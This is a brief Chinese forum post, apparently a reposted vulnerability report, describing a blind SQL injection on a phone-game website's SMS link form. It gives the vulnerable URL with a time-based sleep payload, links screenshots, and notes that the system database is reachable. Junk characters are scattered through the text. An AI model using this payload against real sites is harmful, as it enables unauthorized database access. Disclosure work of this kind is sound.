简要描述: ~3 ^* E9 N' C
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。4 H9 H3 q* m# u/ F& g. I2 X
; r% k- h1 G5 n$ t& W
详细说明:4 [, {* F1 m5 \1 L9 |! y
存在SQL盲注url:
5 T. c( Y$ B! c& F* Y: wfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
( v$ H! m7 q' j# w! G' hhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png; A; M: m R" C2 x) r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png( b5 O* M, M2 k
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg9 |5 @+ s+ c" M' Y2 e* r1 U3 f6 s) e3 W
4 A* e8 k1 C2 }" W) h. P
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对